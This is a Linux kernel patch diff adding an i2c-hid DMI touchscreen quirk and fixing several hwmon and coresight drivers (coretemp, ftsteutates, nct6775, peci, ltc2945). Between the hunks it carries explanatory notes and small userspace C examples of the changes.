+ 	hid->vendor = le16_to_cpu(ihid->hdesc.wVendorID);
+ 	hid->product = le16_to_cpu(ihid->hdesc.wProductID);
+ 
++	hid->initial_quirks = quirks;
++	hid->initial_quirks |= i2c_hid_get_dmi_quirks(hid->vendor,
++						      hid->product);
++
+ 	snprintf(hid->name, sizeof(hid->name), "%s %04X:%04X",
+ 		 client->name, (u16)hid->vendor, (u16)hid->product);
+ 	strscpy(hid->phys, dev_name(&client->dev), sizeof(hid->phys));
+@@ -1048,8 +1052,6 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
+ 		goto err_mem_free;
+ 	}
+ 
+-	hid->quirks |= quirks;
+-
+ 	return 0;
+ 
+ err_mem_free:
+diff --git a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+index 8e0f67455c098..210f17c3a0be0 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
++++ b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+@@ -10,8 +10,10 @@
+ #include <linux/types.h>
+ #include <linux/dmi.h>
+ #include <linux/mod_devicetable.h>
++#include <linux/hid.h>
+ 
+ #include "i2c-hid.h"
++#include "../hid-ids.h"
+ 
+ 
+ struct i2c_hid_desc_override {
+@@ -416,6 +418,28 @@ static const struct dmi_system_id i2c_hid_dmi_desc_override_table[] = {
+ 	{ }	/* Terminate list */
+ };
+ 
++static const struct hid_device_id i2c_hid_elan_flipped_quirks = {
++	HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8, USB_VENDOR_ID_ELAN, 0x2dcd),
++		HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT
++};
++
++/*
++ * This list contains devices which have specific issues based on the system
++ * they're on and not just the device itself. The driver_data holds a
++ * specific HID device ID to match against.
++ */
++static const struct dmi_system_id i2c_hid_dmi_quirk_table[] = {
++	{
++		.ident = "DynaBook K50/FR",
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&i2c_hid_elan_flipped_quirks,
++	},
++	{ }	/* Terminate list */
++};
++
+ 
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+ {
+@@ -450,3 +474,21 @@ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 	*size = override->hid_report_desc_size;
+ 	return override->hid_report_desc;
+ }
++
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{
++	u32 quirks = 0;
++	const struct dmi_system_id *system_id =
++			dmi_first_match(i2c_hid_dmi_quirk_table);
++
++	if (system_id) {
++		const struct hid_device_id *device_id =
++				(struct hid_device_id *)(system_id->driver_data);
++
++		if (device_id && device_id->vendor == vendor &&
++		    device_id->product == product)
++			quirks = device_id->driver_data;
++	}
++
++	return quirks;
++}
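A runnable userspace analogue of the DMI-gated quirk lookup added above: match the system first, then the HID vendor/product id, and only then hand back quirk bits. The table layout and quirk values are simplified stand-ins for the real dmi_system_id/hid_device_id structures:

#include <stdio.h>
#include <string.h>

struct quirk_entry {
	const char *sys_vendor;			/* DMI system vendor */
	unsigned short vendor, product;		/* HID ids */
	unsigned int quirks;
};

#define QUIRK_X_INVERT	0x1
#define QUIRK_Y_INVERT	0x2

static const struct quirk_entry table[] = {
	{ "Dynabook Inc.", 0x04f3, 0x2dcd, QUIRK_X_INVERT | QUIRK_Y_INVERT },
	{ NULL, 0, 0, 0 }			/* sentinel */
};

static unsigned int get_quirks(const char *vendor,
			       unsigned short vid, unsigned short pid)
{
	const struct quirk_entry *e;

	for (e = table; e->sys_vendor; e++)
		if (!strcmp(e->sys_vendor, vendor) &&
		    e->vendor == vid && e->product == pid)
			return e->quirks;
	return 0;
}

int main(void)
{
	printf("quirks = 0x%x\n", get_quirks("Dynabook Inc.", 0x04f3, 0x2dcd));
	return 0;
}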
+diff --git a/drivers/hid/i2c-hid/i2c-hid.h b/drivers/hid/i2c-hid/i2c-hid.h
+index 96c75510ad3f1..2c7b66d5caa0f 100644
+--- a/drivers/hid/i2c-hid/i2c-hid.h
++++ b/drivers/hid/i2c-hid/i2c-hid.h
+@@ -9,6 +9,7 @@
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name);
+ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 					       unsigned int *size);
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product);
+ #else
+ static inline struct i2c_hid_desc
+ 		   *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+@@ -16,6 +17,8 @@ static inline struct i2c_hid_desc
+ static inline char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 							     unsigned int *size)
+ { return NULL; }
++static inline u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{ return 0; }
+ #endif
+ 
+ /**
+diff --git a/drivers/hwmon/Kconfig b/drivers/hwmon/Kconfig
+index d3bccc8176c51..a5143d01b95f8 100644
+--- a/drivers/hwmon/Kconfig
++++ b/drivers/hwmon/Kconfig
+@@ -1508,7 +1508,7 @@ config SENSORS_NCT6775_CORE
+ config SENSORS_NCT6775
+ 	tristate "Platform driver for Nuvoton NCT6775F and compatibles"
+ 	depends on !PPC
+-	depends on ACPI_WMI || ACPI_WMI=n
++	depends on ACPI || ACPI=n
+ 	select HWMON_VID
+ 	select SENSORS_NCT6775_CORE
+ 	help
+diff --git a/drivers/hwmon/asus-ec-sensors.c b/drivers/hwmon/asus-ec-sensors.c
+index a901e4e33d81d..b4d65916b3c00 100644
+--- a/drivers/hwmon/asus-ec-sensors.c
++++ b/drivers/hwmon/asus-ec-sensors.c
+@@ -299,6 +299,7 @@ static const struct ec_board_info board_info_pro_art_x570_creator_wifi = {
+ 	.sensors = SENSOR_SET_TEMP_CHIPSET_CPU_MB | SENSOR_TEMP_VRM |
+ 		SENSOR_TEMP_T_SENSOR | SENSOR_FAN_CPU_OPT |
+ 		SENSOR_CURR_CPU | SENSOR_IN_CPU_CORE,
++	.mutex_path = ASUS_HW_ACCESS_MUTEX_ASMX,
+ 	.family = family_amd_500_series,
+ };
+ 
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index 9bee4d33fbdf0..baaf8af4cb443 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -550,66 +550,49 @@ static void coretemp_remove_core(struct platform_data *pdata, int indx)
+ 		ida_free(&pdata->ida, indx - BASE_SYSFS_ATTR_NO);
+ }
+ 
+-static int coretemp_probe(struct platform_device *pdev)
++static int coretemp_device_add(int zoneid)
+ {
+-	struct device *dev = &pdev->dev;
++	struct platform_device *pdev;
+ 	struct platform_data *pdata;
++	int err;
+ 
+ 	/* Initialize the per-zone data structures */
+-	pdata = devm_kzalloc(dev, sizeof(struct platform_data), GFP_KERNEL);
++	pdata = kzalloc(sizeof(*pdata), GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+ 
+-	pdata->pkg_id = pdev->id;
++	pdata->pkg_id = zoneid;
+ 	ida_init(&pdata->ida);
+-	platform_set_drvdata(pdev, pdata);
+ 
+-	pdata->hwmon_dev = devm_hwmon_device_register_with_groups(dev, DRVNAME,
+-								  pdata, NULL);
+-	return PTR_ERR_OR_ZERO(pdata->hwmon_dev);
+-}
+-
+-static int coretemp_remove(struct platform_device *pdev)
+-{
+-	struct platform_data *pdata = platform_get_drvdata(pdev);
+-	int i;
++	pdev = platform_device_alloc(DRVNAME, zoneid);
++	if (!pdev) {
++		err = -ENOMEM;
++		goto err_free_pdata;
++	}
+ 
+-	for (i = MAX_CORE_DATA - 1; i >= 0; --i)
+-		if (pdata->core_data[i])
+-			coretemp_remove_core(pdata, i);
++	err = platform_device_add(pdev);
++	if (err)
++		goto err_put_dev;
+ 
+-	ida_destroy(&pdata->ida);
++	platform_set_drvdata(pdev, pdata);
++	zone_devices[zoneid] = pdev;
+ 	return 0;
+-}
+ 
+-static struct platform_driver coretemp_driver = {
+-	.driver = {
+-		.name = DRVNAME,
+-	},
+-	.probe = coretemp_probe,
+-	.remove = coretemp_remove,
+-};
++err_put_dev:
++	platform_device_put(pdev);
++err_free_pdata:
++	kfree(pdata);
++	return err;
++}
+ 
+-static struct platform_device *coretemp_device_add(unsigned int cpu)
++static void coretemp_device_remove(int zoneid)
+ {
+-	int err, zoneid = topology_logical_die_id(cpu);
+-	struct platform_device *pdev;
+-
+-	if (zoneid < 0)
+-		return ERR_PTR(-ENOMEM);
+-
+-	pdev = platform_device_alloc(DRVNAME, zoneid);
+-	if (!pdev)
+-		return ERR_PTR(-ENOMEM);
+-
+-	err = platform_device_add(pdev);
+-	if (err) {
+-		platform_device_put(pdev);
+-		return ERR_PTR(err);
+-	}
++	struct platform_device *pdev = zone_devices[zoneid];
++	struct platform_data *pdata = platform_get_drvdata(pdev);
+ 
+-	zone_devices[zoneid] = pdev;
+-	return pdev;
++	ida_destroy(&pdata->ida);
++	kfree(pdata);
++	platform_device_unregister(pdev);
+ }
+ 
+ static int coretemp_cpu_online(unsigned int cpu)
+@@ -633,7 +616,10 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 	if (!cpu_has(c, X86_FEATURE_DTHERM))
+ 		return -ENODEV;
+ 
+-	if (!pdev) {
++	pdata = platform_get_drvdata(pdev);
++	if (!pdata->hwmon_dev) {
++		struct device *hwmon;
++
+ 		/* Check the microcode version of the CPU */
+ 		if (chk_ucode_version(cpu))
+ 			return -EINVAL;
+@@ -644,9 +630,11 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 		 * online. So, initialize per-pkg data structures and
+ 		 * then bring this core online.
+ 		 */
+-		pdev = coretemp_device_add(cpu);
+-		if (IS_ERR(pdev))
+-			return PTR_ERR(pdev);
++		hwmon = hwmon_device_register_with_groups(&pdev->dev, DRVNAME,
++							  pdata, NULL);
++		if (IS_ERR(hwmon))
++			return PTR_ERR(hwmon);
++		pdata->hwmon_dev = hwmon;
+ 
+ 		/*
+ 		 * Check whether pkgtemp support is available.
+@@ -656,7 +644,6 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 			coretemp_add_core(pdev, cpu, 1);
+ 	}
+ 
+-	pdata = platform_get_drvdata(pdev);
+ 	/*
+ 	 * Check whether a thread sibling is already online. If not add the
+ 	 * interface for this CPU core.
+@@ -675,18 +662,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	struct temp_data *tdata;
+ 	int i, indx = -1, target;
+ 
+-	/*
+-	 * Don't execute this on suspend as the device remove locks
+-	 * up the machine.
+-	 */
++	/* No need to tear down any interfaces for suspend */
+ 	if (cpuhp_tasks_frozen)
+ 		return 0;
+ 
+ 	/* If the physical CPU device does not exist, just return */
+-	if (!pdev)
+-		return 0;
+-
+ 	pd = platform_get_drvdata(pdev);
++	if (!pd->hwmon_dev)
++		return 0;
+ 
+ 	for (i = 0; i < NUM_REAL_CORES; i++) {
+ 		if (pd->cpu_map[i] == topology_core_id(cpu)) {
+@@ -718,13 +701,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	}
+ 
+ 	/*
+-	 * If all cores in this pkg are offline, remove the device. This
+-	 * will invoke the platform driver remove function, which cleans up
+-	 * the rest.
++	 * If all cores in this pkg are offline, remove the interface.
+ 	 */
++	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (cpumask_empty(&pd->cpumask)) {
+-		zone_devices[topology_logical_die_id(cpu)] = NULL;
+-		platform_device_unregister(pdev);
++		if (tdata)
++			coretemp_remove_core(pd, PKG_SYSFS_ATTR_NO);
++		hwmon_device_unregister(pd->hwmon_dev);
++		pd->hwmon_dev = NULL;
+ 		return 0;
+ 	}
+ 
+@@ -732,7 +716,6 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	 * Check whether this core is the target for the package
+ 	 * interface. We need to assign it to some other cpu.
+ 	 */
+-	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (tdata && tdata->cpu == cpu) {
+ 		target = cpumask_first(&pd->cpumask);
+ 		mutex_lock(&tdata->update_lock);
+@@ -751,7 +734,7 @@ static enum cpuhp_state coretemp_hp_online;
+ 
+ static int __init coretemp_init(void)
+ {
+-	int err;
++	int i, err;
+ 
+ 	/*
+ 	 * CPUID.06H.EAX[0] indicates whether the CPU has thermal
+@@ -767,20 +750,22 @@ static int __init coretemp_init(void)
+ 	if (!zone_devices)
+ 		return -ENOMEM;
+ 
+-	err = platform_driver_register(&coretemp_driver);
+-	if (err)
+-		goto outzone;
++	for (i = 0; i < max_zones; i++) {
++		err = coretemp_device_add(i);
++		if (err)
++			goto outzone;
++	}
+ 
+ 	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "hwmon/coretemp:online",
+ 				coretemp_cpu_online, coretemp_cpu_offline);
+ 	if (err < 0)
+-		goto outdrv;
++		goto outzone;
+ 	coretemp_hp_online = err;
+ 	return 0;
+ 
+-outdrv:
+-	platform_driver_unregister(&coretemp_driver);
+ outzone:
++	while (i--)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ 	return err;
+ }
+@@ -788,8 +773,11 @@ module_init(coretemp_init)
+ 
+ static void __exit coretemp_exit(void)
+ {
++	int i;
++
+ 	cpuhp_remove_state(coretemp_hp_online);
+-	platform_driver_unregister(&coretemp_driver);
++	for (i = 0; i < max_zones; i++)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ }
+ module_exit(coretemp_exit)
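After this refactor the per-package platform devices live for the lifetime of the module, and the hwmon interface is created by the first CPU of a package to come online and torn down by the last one to go offline. A runnable toy model of that first-on/last-off lifecycle (the real driver tracks a per-package cpumask rather than a counter):

#include <stdio.h>

static int online_count;

static void cpu_online(void)
{
	if (online_count++ == 0)
		printf("first CPU online: register hwmon interface\n");
}

static void cpu_offline(void)
{
	if (--online_count == 0)
		printf("last CPU offline: unregister hwmon interface\n");
}

int main(void)
{
	cpu_online();		/* interface created once */
	cpu_online();
	cpu_offline();
	cpu_offline();		/* torn down when the package empties */
	return 0;
}

Keeping the devices registered across suspend is what lets coretemp_cpu_offline() simply return when cpuhp_tasks_frozen is set, instead of the old remove path that could wedge the machine.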
+diff --git a/drivers/hwmon/ftsteutates.c b/drivers/hwmon/ftsteutates.c
+index f5b8e724a8ca1..ffa0bb3648775 100644
+--- a/drivers/hwmon/ftsteutates.c
++++ b/drivers/hwmon/ftsteutates.c
+@@ -12,6 +12,7 @@
+ #include <linux/i2c.h>
+ #include <linux/init.h>
+ #include <linux/jiffies.h>
++#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/slab.h>
+@@ -347,13 +348,15 @@ static ssize_t in_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->volt[index]);
++	value = DIV_ROUND_CLOSEST(data->volt[index] * 3300, 255);
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_value_show(struct device *dev,
+@@ -361,13 +364,15 @@ static ssize_t temp_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->temp_input[index]);
++	value = (data->temp_input[index] - 64) * 1000;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_fault_show(struct device *dev,
+@@ -436,13 +441,15 @@ static ssize_t fan_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->fan_input[index]);
++	value = data->fan_input[index] * 60;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t fan_source_show(struct device *dev,
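The three show-function hunks above stop exporting raw register values and convert them to the units the hwmon sysfs ABI expects: millivolts, millidegrees Celsius and RPM. Worked examples of each conversion, runnable as-is (the simplified DIV_ROUND_CLOSEST only matches the kernel macro for non-negative operands; the raw values are arbitrary):

#include <stdio.h>

/* round-to-nearest integer division, as in the kernel's DIV_ROUND_CLOSEST() */
#define DIV_ROUND_CLOSEST(x, d)	(((x) + (d) / 2) / (d))

int main(void)
{
	int volt_raw = 128, temp_raw = 100, fan_raw = 20;

	/* 8-bit ADC spanning 0..3300 mV */
	printf("in:   %d mV\n", DIV_ROUND_CLOSEST(volt_raw * 3300, 255));	/* 1656 */
	/* register holds degrees Celsius offset by 64 */
	printf("temp: %d mC\n", (temp_raw - 64) * 1000);			/* 36000 */
	/* register counts revolutions per second */
	printf("fan:  %d RPM\n", fan_raw * 60);					/* 1200 */
	return 0;
}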
+diff --git a/drivers/hwmon/ltc2945.c b/drivers/hwmon/ltc2945.c
+index 9adebb59f6042..c06ab7317431f 100644
+--- a/drivers/hwmon/ltc2945.c
++++ b/drivers/hwmon/ltc2945.c
+@@ -248,6 +248,8 @@ static ssize_t ltc2945_value_store(struct device *dev,
+ 
+ 	/* convert to register value, then clamp and write result */
+ 	regval = ltc2945_val_to_reg(dev, reg, val);
++	if (regval < 0)
++		return regval;
+ 	if (is_power_reg(reg)) {
+ 		regval = clamp_val(regval, 0, 0xffffff);
+ 		regbuf[0] = regval >> 16;
+diff --git a/drivers/hwmon/mlxreg-fan.c b/drivers/hwmon/mlxreg-fan.c
+index b48bd7c961d66..96017cc8da7ec 100644
+--- a/drivers/hwmon/mlxreg-fan.c
++++ b/drivers/hwmon/mlxreg-fan.c
+@@ -155,6 +155,12 @@ mlxreg_fan_read(struct device *dev, enum hwmon_sensor_types type, u32 attr,
+ 			if (err)
+ 				return err;
+ 
++			if (MLXREG_FAN_GET_FAULT(regval, tacho->mask)) {
++				/* FAN is broken - return zero for FAN speed. */
++				*val = 0;
++				return 0;
++			}
++
+ 			*val = MLXREG_FAN_GET_RPM(regval, fan->divider,
+ 						  fan->samples);
+ 			break;
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index da9ec6983e139..c54233f0369b2 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -1150,7 +1150,7 @@ static int nct6775_write_fan_div(struct nct6775_data *data, int nr)
+ 	if (err)
+ 		return err;
+ 	reg &= 0x70 >> oddshift;
+-	reg |= data->fan_div[nr] & (0x7 << oddshift);
++	reg |= (data->fan_div[nr] & 0x7) << oddshift;
+ 	return nct6775_write_value(data, fandiv_reg, reg);
+ }
+ 
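The one-line nct6775 fix is easy to misread. The old expression ANDed the divider value against an already-shifted mask, so whenever oddshift is 4 a 3-bit divider (at most 7) masked with 0x70 is always zero and the field was never written. Masking to 3 bits first and shifting second puts the value into the register field. A self-contained illustration with made-up values:

#include <stdio.h>

int main(void)
{
	unsigned int reg = 0, fan_div = 0x5;	/* made-up divider */
	int oddshift = 4;			/* field occupies bits 6:4 */

	/* old: value ANDed with a shifted mask, never shifted itself */
	unsigned int bad  = reg | (fan_div & (0x7 << oddshift));
	/* new: truncate to 3 bits, then move into the field */
	unsigned int good = reg | ((fan_div & 0x7) << oddshift);

	printf("bad=%#x good=%#x\n", bad, good);	/* bad=0, good=0x50 */
	return 0;
}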
+diff --git a/drivers/hwmon/nct6775-platform.c b/drivers/hwmon/nct6775-platform.c
+index bf43f73dc835f..76c6b564d7fc4 100644
+--- a/drivers/hwmon/nct6775-platform.c
++++ b/drivers/hwmon/nct6775-platform.c
+@@ -17,7 +17,6 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/regmap.h>
+-#include <linux/wmi.h>
+ 
+ #include "nct6775.h"
+ 
+@@ -107,40 +106,51 @@ struct nct6775_sio_data {
+ 	void (*sio_exit)(struct nct6775_sio_data *sio_data);
+ };
+ 
+-#define ASUSWMI_MONITORING_GUID		"466747A0-70EC-11DE-8A39-0800200C9A66"
++#define ASUSWMI_METHOD			"WMBD"
+ #define ASUSWMI_METHODID_RSIO		0x5253494F
+ #define ASUSWMI_METHODID_WSIO		0x5753494F
+ #define ASUSWMI_METHODID_RHWM		0x5248574D
+ #define ASUSWMI_METHODID_WHWM		0x5748574D
+ #define ASUSWMI_UNSUPPORTED_METHOD	0xFFFFFFFE
++#define ASUSWMI_DEVICE_HID		"PNP0C14"
++#define ASUSWMI_DEVICE_UID		"ASUSWMI"
++#define ASUSMSI_DEVICE_UID		"AsusMbSwInterface"
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * ASUS boards have only one device with the WMI "WMBD" method, and it
++ * provides access to only one SuperIO chip at 0x0290.
++ */
++static struct acpi_device *asus_acpi_dev;
++#endif
+ 
+ static int nct6775_asuswmi_evaluate_method(u32 method_id, u8 bank, u8 reg, u8 val, u32 *retval)
+ {
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
++#if IS_ENABLED(CONFIG_ACPI)
++	acpi_handle handle = acpi_device_handle(asus_acpi_dev);
+ 	u32 args = bank | (reg << 8) | (val << 16);
+-	struct acpi_buffer input = { (acpi_size) sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
++	struct acpi_object_list input;
++	union acpi_object params[3];
++	unsigned long long result;
+ 	acpi_status status;
+-	union acpi_object *obj;
+-	u32 tmp = ASUSWMI_UNSUPPORTED_METHOD;
+-
+-	status = wmi_evaluate_method(ASUSWMI_MONITORING_GUID, 0,
+-				     method_id, &input, &output);
+ 
++	params[0].type = ACPI_TYPE_INTEGER;
++	params[0].integer.value = 0;
++	params[1].type = ACPI_TYPE_INTEGER;
++	params[1].integer.value = method_id;
++	params[2].type = ACPI_TYPE_BUFFER;
++	params[2].buffer.length = sizeof(args);
++	params[2].buffer.pointer = (void *)&args;
++	input.count = 3;
++	input.pointer = params;
++
++	status = acpi_evaluate_integer(handle, ASUSWMI_METHOD, &input, &result);
+ 	if (ACPI_FAILURE(status))
+ 		return -EIO;
+ 
+-	obj = output.pointer;
+-	if (obj && obj->type == ACPI_TYPE_INTEGER)
+-		tmp = obj->integer.value;
+-
+ 	if (retval)
+-		*retval = tmp;
+-
+-	kfree(obj);
++		*retval = (u32)result & 0xFFFFFFFF;
+ 
+-	if (tmp == ASUSWMI_UNSUPPORTED_METHOD)
+-		return -ENODEV;
+ 	return 0;
+ #else
+ 	return -EOPNOTSUPP;
+@@ -1099,6 +1109,91 @@ static const char * const asus_wmi_boards[] = {
+ 	"TUF GAMING Z490-PLUS (WI-FI)",
+ };
+ 
++static const char * const asus_msi_boards[] = {
++	"EX-B660M-V5 PRO D4",
++	"PRIME B650-PLUS",
++	"PRIME B650M-A",
++	"PRIME B650M-A AX",
++	"PRIME B650M-A II",
++	"PRIME B650M-A WIFI",
++	"PRIME B650M-A WIFI II",
++	"PRIME B660M-A D4",
++	"PRIME B660M-A WIFI D4",
++	"PRIME X670-P",
++	"PRIME X670-P WIFI",
++	"PRIME X670E-PRO WIFI",
++	"Pro B660M-C-D4",
++	"ProArt B660-CREATOR D4",
++	"ProArt X670E-CREATOR WIFI",
++	"ROG CROSSHAIR X670E EXTREME",
++	"ROG CROSSHAIR X670E GENE",
++	"ROG CROSSHAIR X670E HERO",
++	"ROG MAXIMUS XIII EXTREME GLACIAL",
++	"ROG MAXIMUS Z690 EXTREME",
++	"ROG MAXIMUS Z690 EXTREME GLACIAL",
++	"ROG STRIX B650-A GAMING WIFI",
++	"ROG STRIX B650E-E GAMING WIFI",
++	"ROG STRIX B650E-F GAMING WIFI",
++	"ROG STRIX B650E-I GAMING WIFI",
++	"ROG STRIX B660-A GAMING WIFI D4",
++	"ROG STRIX B660-F GAMING WIFI",
++	"ROG STRIX B660-G GAMING WIFI",
++	"ROG STRIX B660-I GAMING WIFI",
++	"ROG STRIX X670E-A GAMING WIFI",
++	"ROG STRIX X670E-E GAMING WIFI",
++	"ROG STRIX X670E-F GAMING WIFI",
++	"ROG STRIX X670E-I GAMING WIFI",
++	"ROG STRIX Z590-A GAMING WIFI II",
++	"ROG STRIX Z690-A GAMING WIFI D4",
++	"TUF GAMING B650-PLUS",
++	"TUF GAMING B650-PLUS WIFI",
++	"TUF GAMING B650M-PLUS",
++	"TUF GAMING B650M-PLUS WIFI",
++	"TUF GAMING B660M-PLUS WIFI",
++	"TUF GAMING X670E-PLUS",
++	"TUF GAMING X670E-PLUS WIFI",
++	"TUF GAMING Z590-PLUS WIFI",
++};
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * Callback for acpi_bus_for_each_dev() to find the right device
++ * by _UID and _HID and return 1 to stop iteration.
++ */
++static int nct6775_asuswmi_device_match(struct device *dev, void *data)
++{
++	struct acpi_device *adev = to_acpi_device(dev);
++	const char *uid = acpi_device_uid(adev);
++	const char *hid = acpi_device_hid(adev);
++
++	if (hid && !strcmp(hid, ASUSWMI_DEVICE_HID) && uid && !strcmp(uid, data)) {
++		asus_acpi_dev = adev;
++		return 1;
++	}
++
++	return 0;
++}
++#endif
++
++static enum sensor_access nct6775_determine_access(const char *device_uid)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	u8 tmp;
++
++	acpi_bus_for_each_dev(nct6775_asuswmi_device_match, (void *)device_uid);
++	if (!asus_acpi_dev)
++		return access_direct;
++
++	/* if reading chip id via ACPI succeeds, use WMI "WMBD" method for access */
++	if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
++		pr_debug("Using Asus WMBD method of %s to access %#x chip.\n", device_uid, tmp);
++		return access_asuswmi;
++	}
++#endif
++
++	return access_direct;
++}
++
+ static int __init sensors_nct6775_platform_init(void)
+ {
+ 	int i, err;
+@@ -1109,7 +1204,6 @@ static int __init sensors_nct6775_platform_init(void)
+ 	int sioaddr[2] = { 0x2e, 0x4e };
+ 	enum sensor_access access = access_direct;
+ 	const char *board_vendor, *board_name;
+-	u8 tmp;
+ 
+ 	err = platform_driver_register(&nct6775_driver);
+ 	if (err)
+@@ -1122,15 +1216,13 @@ static int __init sensors_nct6775_platform_init(void)
+ 	    !strcmp(board_vendor, "ASUSTeK COMPUTER INC.")) {
+ 		err = match_string(asus_wmi_boards, ARRAY_SIZE(asus_wmi_boards),
+ 				   board_name);
+-		if (err >= 0) {
+-			/* if reading chip id via WMI succeeds, use WMI */
+-			if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
+-				pr_info("Using Asus WMI to access %#x chip.\n", tmp);
+-				access = access_asuswmi;
+-			} else {
+-				pr_err("Can't read ChipID by Asus WMI.\n");
+-			}
+-		}
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSWMI_DEVICE_UID);
++
++		err = match_string(asus_msi_boards, ARRAY_SIZE(asus_msi_boards),
++				   board_name);
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSMSI_DEVICE_UID);
+ 	}
+ 
+ 	/*
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 57470fda5f6c9..30850a479f61f 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -402,7 +402,7 @@ static int create_temp_label(struct peci_cputemp *priv)
+ 	unsigned long core_max = find_last_bit(priv->core_mask, CORE_NUMS_MAX);
+ 	int i;
+ 
+-	priv->coretemp_label = devm_kzalloc(priv->dev, core_max * sizeof(char *), GFP_KERNEL);
++	priv->coretemp_label = devm_kzalloc(priv->dev, (core_max + 1) * sizeof(char *), GFP_KERNEL);
+ 	if (!priv->coretemp_label)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/hwtracing/coresight/coresight-cti-core.c b/drivers/hwtracing/coresight/coresight-cti-core.c
+index d2cf4f4848e1b..838872f2484d3 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-core.c
++++ b/drivers/hwtracing/coresight/coresight-cti-core.c
+@@ -151,9 +151,16 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ {
+ 	struct cti_config *config = &drvdata->config;
+ 	struct coresight_device *csdev = drvdata->csdev;
++	int ret = 0;
+ 
+ 	spin_lock(&drvdata->spinlock);
+ 
++	/* don't allow negative refcounts, return an error */
++	if (!atomic_read(&drvdata->config.enable_req_count)) {
++		ret = -EINVAL;
++		goto cti_not_disabled;
++	}
++
+ 	/* check refcount - disable on 0 */
+ 	if (atomic_dec_return(&drvdata->config.enable_req_count) > 0)
+ 		goto cti_not_disabled;
+@@ -171,12 +178,12 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ 	coresight_disclaim_device_unlocked(csdev);
+ 	CS_LOCK(drvdata->base);
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ 
+ 	/* not disabled this call */
+ cti_not_disabled:
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ }
+ 
+ void cti_write_single_reg(struct cti_drvdata *drvdata, int offset, u32 value)
+diff --git a/drivers/hwtracing/coresight/coresight-cti-sysfs.c b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+index 6d59c815ecf5e..71e7a8266bb32 100644
